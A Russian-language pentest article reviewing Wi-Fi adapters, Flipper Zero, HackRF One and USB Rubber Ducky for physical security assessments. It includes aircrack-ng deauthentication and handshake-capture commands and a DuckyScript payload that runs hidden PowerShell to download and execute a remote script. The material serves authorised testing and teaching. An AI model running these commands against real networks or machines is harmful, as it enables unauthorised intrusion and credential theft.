РАЗБОР
На проверке
Железо для хакера: обзор реальных устройств
[ обложка статьи ]
Режим чтения
Physical assessment для логистической компании. Клиент спокоен: СКУД на NFC-картах, корпоративный Wi-Fi с WPA2-Enterprise, USB-устройства заблокированы через GPO. За один рабочий день четыре устройства общей стоимостью меньше $700 закрыли четыре вектора начального доступа. Alfa AWUS036ACH подняла Evil Twin в переговорной - два сотрудника ввели доменные пароли в фейковый портал. Flipper Zero клонировал RFID-бейдж 125 kHz у курьера на входе. HackRF One перехватил сигнал ворот паркинга на 433 МГц с OOK-модуляцией. USB Rubber Ducky отработал reverse shell на незалоченном терминале ресепшена (без активного AMSI/Defender) за 4 секунды. Ни одна система защиты не среагировала. Ни на одно из действий.
Этот набор - не витрина гаджетов для красивых фоток в Instagram. Это инструментарий, которым закрывается 80% задач physical pentest.
Почему в обзоре именно эти четыре категории
На рынке десятки устройств для пентеста: WiFi Pineapple, Proxmark3, Bash Bunny, O.MG Cable, LAN Turtle, ESP32-платы, Ubertooth One. Четыре категории выбраны по покрытию основных векторов физического тестирования по MITRE ATT&CK - каждое устройство закрывает свою группу техник в цепочке от начального доступа до эксфильтрации.| Вектор атаки | Техника MITRE ATT&CK | Устройство |
|---|---|---|
| Wi-Fi: rogue AP, перехват трафика | Evil Twin (T1557.004), Network Sniffing (T1040), Wi-Fi Discovery (T1016.002) | Wi-Fi адаптер с monitor mode |
| Физический доступ: RFID/NFC/Sub-GHz | Hardware Additions (T1200, Initial Access) | Flipper Zero |
| Радиочастотный анализ проприетарных протоколов | Network Sniffing (T1040, по аналогии - ATT&CK не имеет отдельной техники для RF-сниффинга вне сетевых протоколов) | HackRF One |
| Доставка payload через USB | Hardware Additions (T1200, Initial Access), Command and Scripting Interpreter: PowerShell (T1059.001, Execution - Windows) | USB Rubber Ducky |
Четыре категории вместе - минимальный набор для полноценного physical assessment. Бизнес-логика простая: злоумышленник, получивший физический доступ к сети через любой из этих векторов, дальше переходит к lateral movement и эксфильтрации. Задача пентестера - показать заказчику этот путь до того, как его пройдёт реальный атакующий.
Что не вошло в обзор и почему:
WiFi Pineapple Mark VII - специализированный rogue AP от Hak5 с тремя радиомодулями и веб-интерфейсом для автоматизации Wi-Fi-кампаний. Штука удобная, но связка Alfa-адаптера с
hostapd покрывает те же сценарии при стоимости в 3-4 раза ниже. Pineapple выигрывает по удобству автоматизации, а для понимания механики атаки Alfa полезнее.Proxmark3 RDV4/5 - gold standard для RFID-исследований. Криптоанализ MIFARE DESFire, relay-атаки, снифф коммуникаций между картой и ридером. По данным Lab401, Proxmark 5 на 65% быстрее предшественника и поддерживает беспроводной модуль. Но для 80% задач physical assessment - клонирование EM4100, HID Prox, чтение MIFARE Classic - Flipper Zero достаточен. Proxmark - следующая ступень.
Ubertooth One - единственный инструмент для полноценного Bluetooth-аудита (BLE sniffing, перехват на уровне link layer). Bluetooth-вектор и техника Exfiltration Over Bluetooth (T1011.001) - тема для отдельной статьи.
Bash Bunny / O.MG Cable - развитие концепции Rubber Ducky. Рассмотрены как аналоги в разделе о keystroke injection.
Wi-Fi адаптер для Kali Linux: от чипсета до handshake
Встроенная Wi-Fi карта ноутбука для пентеста не годится в 95% случаев. Нужен внешний адаптер с поддержкой monitor mode (пассивный захват фреймов) и packet injection (отправка произвольных фреймов). Без этих двух режимов ни деаутентификация клиентов, ни захват WPA handshake, ни разворачивание Evil Twin - ничего из этого не взлетит.Какой чипсет выбрать для monitor mode
В Wi-Fi адаптере для взлома решает не бренд и не длина антенны - решает чипсет. От него зависит совместимость с драйверами Kali Linux и стабильность в нужных режимах.| Чипсет | Диапазоны | Monitor mode | Packet injection | Драйвер в Kali | Модель-пример | Ограничения |
|---|---|---|---|---|---|---|
| RTL8812AU | 2.4 + 5 GHz | Да | Да | rtl8812au (DKMS) | Alfa AWUS036ACH | Требует сборки драйвера; нагрев при длительной работе |
| AR9271 | 2.4 GHz | Да | Да | ath9k_htl (в ядре) | Alfa AWUS036NHA | Только 2.4 GHz - не видит 5 GHz сети |
| RTL8811AU | 2.4 + 5 GHz | Да | Да | rtl8812au | Alfa AWUS036ACS | Одна антенна, ниже мощность TX |
| MT7612U | 2.4 + 5 GHz | Да | Частично | mt76 (в ядре) | Netgear A6210 | Injection нестабилен на некоторых ядрах |
Alfa AWUS036ACH - адаптер, который беру на каждый проект. Двухдиапазонный, две съёмные антенны RP-SMA (можно заменить на направленные 9 dBi для увеличения дальности), чипсет RTL8812AU с полной поддержкой monitor mode и injection в обоих диапазонах. Единственная боль - драйвер не в ядре, нужна установка через DKMS, и после обновления ядра Kali иногда приходится пересобирать. Классика жанра.
Alfa AWUS036NHA - бюджетный вариант на AR9271 за $25-35. Работает только в 2.4 GHz, зато драйвер
ath9k_htl уже в ядре - подключил и работаешь. Для первого адаптера - оптимальный выбор.Когда адаптер не поможет: WPA2/3-Enterprise с EAP-TLS (аутентификация по сертификатам) - перехват handshake бесполезен. Тут нужен rogue RADIUS или social engineering для получения сертификата.
Захват handshake на практике
Базовая цепочка для адаптера мониторинга Wi-Fi в Kali Linux:
Bash:
# Убиваем процессы, блокирующие интерфейс
sudo airmon-ng check kill
# Переводим адаптер в monitor mode
sudo airmon-ng start wlan0
# Сканируем эфир - все AP и клиенты
sudo airodump-ng wlan0mon
# Фиксируем handshake конкретной сети
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c CC:DD:EE:FF:00:11 wlan0mon - деаутентификация конкретного клиента (-c) для провокации повторного подключения и захвата handshake. Без -c отправляется broadcast deauth - менее надёжно, и не сработает при включённом PMF (802.11w). Файл capture-01.cap уходит в hashcat -m 22000 для офлайн-перебора.Момент, который часто упускают: деаутентификация - это denial of service, и она не работает против клиентов с включённым PMF (802.11w). Для современных WPA2-Enterprise это типичная настройка, а в WPA3 - обязательная. В таких случаях нужен downgrade attack или ожидание естественного reconnect. На одном engagement заказчик запретил deauth в рабочие часы. Пришлось ждать до 19:00 и работать с теми клиентами, которые подключались к Wi-Fi после окончания рабочего дня. Всегда уточняйте допустимость DoS-воздействия в scope - иначе можно нечаянно положить продакшен.
Flipper Zero: возможности и пределы мультитула
Flipper Zero - самое обсуждаемое железо для хакера за последние два года. Его показывают на конференциях, демонстрируют на YouTube, запрещают на Amazon. За хайпом скрывается реально полезный инструмент для physical assessment, но с чётким набором ограничений, о которых маркетинг предпочитает молчать.Sub-GHz, RFID, NFC, BadUSB - что внутри
По данным flipper.net, в корпусе размером 100×40×25 мм и весом 102 грамма собран целый зоопарк:- Sub-1 GHz трансивер на чипе CC1101 - передача и приём в полосах 315/433/868/915 МГц. Модуляции OOK, ASK, 2-FSK, 4-FSK, GFSK, MSK. Дальность до 50 метров. Покрывает шлагбаумы, ворота, IoT-сенсоры, брелки со статическим кодом.
- 125 kHz RFID - чтение, запись, эмуляция карт EM4100, HID Prox, Indala, FDX, Viking, PAC Stanley, Gallagher, Jablotron и других. Антенна на нижней панели.
- NFC 13.56 MHz - MIFARE Classic, Ultralight, DESFire, FeliCa, HID iClass (PicoPass). Чтение UID, дамп секторов, эмуляция.
- BadUSB - эмуляция клавиатуры с поддержкой DuckyScript. По сути превращает Flipper Zero в USB Rubber Ducky.
- IR-передатчик/приёмник - встроенная библиотека для TV, кондиционеров, проекторов. Захват и воспроизведение ИК-команд.
- GPIO - 13 пинов, UART/SPI/I2C конвертер для аппаратного анализа.
- BLE 5.4 - связь с мобильным приложением, удалённое управление.
Три реальных сценария на physical assessment
Клонирование RFID-бейджа. Подхожу к входной группе, прошу курьера «приложить карту к считывателю» - Flipper Zero в кармане куртки фиксирует EM4100 за секунду. Эмулирую на устройстве - прохожу через СКУД. Работает только с картами 125 kHz без криптозащиты. С MIFARE DESFire уже нужен Proxmark3 с ключами шифрования - тут Flipper бессилен.Sub-GHz replay. Записываю сигнал открытия ворот паркинга на 433 МГц. Если код статический (фиксированная последовательность) - воспроизвожу и прохожу. Если rolling code (автомобильные брелки, часть современных шлагбаумов) - стоковый Flipper Zero replay не выполнит. Точка.
BadUSB payload. Подключаю Flipper Zero по USB к незалоченному терминалу - DuckyScript запускает PowerShell reverse shell за 3-4 секунды. По MITRE ATT&CK - Hardware Additions (T1200, Initial Access).
Ключевое ограничение, которое стоит зарубить на носу: Flipper Zero - мультитул, не специализированный инструмент. В Sub-GHz уступает HackRF One по диапазону и аналитике. В RFID уступает Proxmark3 по криптоанализу. В BadUSB уступает Rubber Ducky по зрелости payload'ов. Но для быстрой разведки и PoC на физическом пентесте - ничего компактнее пока нет.
Характерный пример: в 2023 году исследователь обнаружил, что Flipper Zero может вызывать краш iPhone через BLE-спам pairing-запросами. Уязвимость затрагивала iOS 17 - Apple позже закрыла вектор. Мультитул за $170 роняет флагманский смартфон - неплохо для «игрушки», правда?
HackRF One: когда Flipper Zero недостаточно
HackRF One - SDR-устройство с диапазоном от 1 МГц до 6 ГГц и полосой до 20 МГц. Если Flipper Zero - швейцарский нож, то HackRF - профессиональный спектроанализатор и трансмиттер в одном корпусе.SDR-устройство vs мультитул: когда нужен именно HackRF
| Параметр | Flipper Zero | HackRF One |
|---|---|---|
| Диапазон | 315/433/868/915 МГц (фиксированные полосы) | 1 МГц - 6 ГГц (непрерывно) |
| Ширина полосы | Узкая (CC1101) | До 20 МГц |
| Передача | Да (маломощная) | Да (half-duplex, до 15 dBm) |
| Анализ спектра | Нет | Да (GNU Radio, gqrx) |
| Автономность | Батарея, экран, кнопки | Нужен ноутбук |
| Цена | ~$170 | ~$300-350 |
| Кривая обучения | Низкая | Высокая (и это мягко сказано) |
Когда HackRF необходим:
Проприетарные беспроводные протоколы - LoRa-датчики, промышленные SCADA-системы, охранные сигнализации на нестандартных частотах. Flipper Zero ограничен предустановленными модуляциями CC1101, а HackRF принимает любой сигнал в диапазоне. Разница как между рацией и полноценным приёмником.
Визуализация спектра - через
gqrx или GNU Radio Companion видно все передачи в полосе. На одном проекте именно waterfall-диаграмма в gqrx показала, что охранная система клиента на 868 МГц использует простую OOK-модуляцию без шифрования. Flipper Zero на этой частоте тоже работает, но без визуализации понять модуляцию было бы значительно сложнее.GSM/LTE-тестирование - развёртывание тестовых базовых станций через srsRAN (требует отдельной лицензии на передачу).
Критическое ограничение: HackRF One - half-duplex. Одновременно принимать и передавать нельзя. Для relay-атак в реальном времени нужны два устройства. 8-битный АЦП даёт динамический диапазон хуже, чем у профессиональных SDR (USRP, BladeRF с 12-бит АЦП). Для задач с высокой чувствительностью приёмника HackRF не оптимален - но за $300 ничего лучше не найти.
Основной софт - GNU Radio Companion для построения обработчиков сигналов и
gqrx для быстрого осмотра эфира. Кривая обучения GNU Radio - самая крутая из всех устройств в этом обзоре. Требуется понимание цифровой обработки сигналов, модуляций и протоколов. Это не «нажал кнопку - получил результат». Скорее «прочитал три книги, собрал flowgraph, отладил час, получил результат».USB Rubber Ducky и аналоги BadUSB
USB Rubber Ducky от Hak5 выглядит как обычная флешка, но компьютер распознаёт его как клавиатуру (HID-устройство). Внутри - процессор и слот microSD для payload-скрипта. ОС доверяет HID-устройствам по умолчанию: никаких запросов на установку драйверов, никаких подтверждений. Воткнул - и оно уже «печатает».DuckyScript payload на практике
DuckyScript - скриптовый язык для описания последовательности нажатий:
Код:
DELAY 2000
GUI r
DELAY 500
STRING powershell -w hidden -nop -c "IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.5/sh.ps1')"
ENTER
REM NB: На Windows 10/11 с включённым Defender/AMSI этот one-liner будет заблокирован - требуется обфускация или AMSI bypass
На реальном engagement самый рискованный момент - физический доступ к USB-порту. Если терминал не залочен и GPO не блокирует HID-устройства - payload отрабатывает штатно. Современные версии Rubber Ducky поддерживают fingerprinting ОС (определяют Windows/Mac/Linux перед запуском) и имитацию человеческой скорости набора для обхода endpoint-решений, отслеживающих аномально быстрый ввод. Хитрая штука - печатает как секретарша, а не как робот.
Аналоги: от DigiSpark до O.MG Cable
| Устройство | Цена | Маскировка | Ключевая особенность | Когда НЕ подходит |
|---|---|---|---|---|
| USB Rubber Ducky (Hak5) | ~$80 | USB-флешка | DuckyScript, fingerprinting ОС, зрелая среда payload'ов | GPO блокирует USB HID |
| Flipper Zero (BadUSB) | ~$170 | Открытое устройство | DuckyScript-совместим плюс все остальные функции | Нужна скрытность подключения |
| Bash Bunny (Hak5) | ~$100 | USB-флешка | DuckyScript + сетевые атаки (Ethernet over USB) | Нужен только keystroke injection |
| O.MG Cable | ~$180 | Lightning/USB-C/micro-USB кабель | Полностью скрыт, Wi-Fi управление удалённо | Бюджетные ограничения |
| DigiSpark (ATtiny85) | ~$3-5 | Миниатюрная плата | Дёшево, программируется в Arduino IDE | Нет DuckyScript, нужна кастомная прошивка |
| Malduino | ~$40 | USB-флешка | Open-source, Arduino-совместим | Менее зрелая среда |
O.MG Cable - отдельная категория скрытности. По данным Lab401, это кабель зарядки с имплантом внутри, управляемый по Wi-Fi. Жертва видит обычный Lightning или USB-C кабель, а оператор выполняет keystroke injection удалённо. На physical assessment - самый скрытный вариант BadUSB-атаки из доступных. Выглядит как зарядка от iPhone. Работает как reverse shell.
Сводная таблица: железо для хакера под задачу
| Критерий | Alfa AWUS036ACH | Flipper Zero | HackRF One | USB Rubber Ducky |
|---|---|---|---|---|
| Цена | ~$50-70 | ~$170 | $300-350 | ~$80 |
| Основная задача | Wi-Fi аудит, Evil Twin | Physical access мультитул | SDR анализ радиочастот | Keystroke injection |
| Автономность | Нужен ноутбук | Полная (батарея + экран) | Нужен ноутбук | Полная |
| Кривая обучения | Средняя | Низкая | Высокая | Низкая |
| Скрытность | Низкая (антенны торчат) | Средняя | Низкая (размер + кабели) | Высокая |
| MITRE ATT&CK | T1557.004, T1040, T1016.002 | T1200, T1059.001 | T1040 | T1200, T1059.001 |
| Когда НЕ подходит | WPA2/3-Enterprise EAP-TLS | MIFARE DESFire, rolling code, широкополосный RF | Full-duplex, автономная работа в поле | Залоченные терминалы, GPO на USB HID |
Что брать первым при ограниченном бюджете: Alfa AWUS036NHA ($25-35) и USB Rubber Ducky ($80) - суммарно ~$110 за Wi-Fi и HID-вектора. Следующий шаг - Flipper Zero как универсальный инструмент для physical assessment. HackRF One - для целенаправленной работы с RF и при готовности вкладывать время в GNU Radio.
Где покупать и правовые рамки
За три года работы с этим набором я пришёл к выводу, который расходится с тем, что пишут в обзорах: 90% результата на physical assessment дают не характеристики устройств, а два других фактора - подготовка сценария и умение разговаривать с людьми. Flipper Zero за $170 бесполезен без предварительной разведки типа СКУД у клиента. HackRF за $350 - дорогой спектроанализатор, если не знаешь, что именно искать в эфире. DigiSpark за $3 с правильным payload и грамотным pretexting доставит reverse shell не хуже Rubber Ducky за $80.
Индустрия движется к конвергенции: Flipper Zero уже вобрал функции пяти отдельных устройств, аксессуары вроде AWOK Dual C5 Touch добавляют ему двухдиапазонный Wi-Fi 6 и BLE wardriving. Через пару лет один гаджет будет покрывать Wi-Fi, BLE, Sub-GHz, NFC, HID и SDR одновременно - зачатки видны уже сейчас. Но пока этого не произошло, набор из четырёх категорий остаётся минимальным и достаточным. Главная ошибка новичков - покупать железо до того, как научились его применять. Если хочется отработать цепочку от physical access до reverse shell на живом стенде - на HackerLab есть сценарии с этой связкой, где EDR в дефолте не мешает разобраться в механике.
AI-выжимка
сгенерировано ИИ
Тезисы статьи скоро
Статья читается полностью. Тезисы со ссылками на разделы появятся позже.
Содержание
Codeby Academy
Практика и мастерство
От основ до продвинутого — программы для практиков Codeby.
Перейти к курсу →
Поиск в обсуждении
Карта ветки
Продолжить чтение
Следующий разбор
Rowhammer атака на память: от физики DRAM до root-shell через GPU — полная карта угроз 2026
Ещё по теме
- Статья
- Статья
- Статья
Комментарии
0